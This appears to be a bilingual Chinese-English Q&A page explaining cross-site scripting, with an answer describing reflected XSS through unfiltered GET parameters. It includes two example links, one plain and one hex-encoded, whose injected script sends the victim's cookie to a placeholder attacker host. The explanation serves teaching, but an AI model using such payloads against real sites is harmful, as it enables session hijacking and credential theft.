XSS 是如何工作的? [英] How does XSS work?

问题描述

有人可以用简单的英语解释 XSS 是如何工作的吗?也许举个例子.谷歌搜索没有多大帮助.

Can someone explain how XSS works in plain english? Maybe with an example. Googling didn't help much.

推荐答案

Cross Site Scripting 基本上是动态网页的一个安全漏洞，攻击者可以通过该漏洞创建恶意链接，将不需要的可执行 JavaScript 注入网站.当 GET 变量在没有过滤或检查其内容的情况下被打印或回显时，会发生此漏洞的最常见情况.

Cross Site Scripting basically is a security vulnerability of dynamic web pages where an attacker can create a malicious link to inject unwanted executable JavaScript into a Web site. The most usual case of this vulnerabilities occurs when GET variables are printed or echoed without filtering or checking their content.

当受害者点击链接时，恶意代码可以将受害者的 cookie 发送到另一台服务器，或者可以修改受影响的站点、注入表单、窃取用户名和密码以及其他网络钓鱼技术.

When a victim clicks the link, the malicious code can then send the victim’s cookie away to another server, or it can modify the affected site, injecting forms, to steal usernames and passwords, and other phishing techniques.

恶意链接示例:

http://VulnerableHost/a.php?variable=<script>document.location='http://AttackersHost/cgi-bin/cookie.cgi%3Fdata='+document.cookie</script>

对恶意代码进行编码也很常见，例如十六进制:

It's also common to encode the malicious code, for example in hex:

http://VulnerableHost/a.php?variable=%22%3E%3C%73%63%72%69%70%74%3E%64%6F%63%75%6D%65%6E%74%2E%6C%6F%63%61%74%69%6F%6E%3D%27%68%74%74%70%3A%2F%2F%41%74%74%61%63%6B%65%72%73%48%6F%73%74%2F%63%67%69%2D%62%69%6E%2F%63%6F%6F%6B%69%65%2E%63%67%69%3F%20%27%2B%64%6F%63%75%6D%65%6E%74%2E%63%6F%6F%6B%69%65%3C%2F%73%63%72%69%70%74%3E

这篇关于XSS 是如何工作的?的文章就介绍到这了，希望我们推荐的答案对大家有所帮助，也希望大家多多支持IT屋！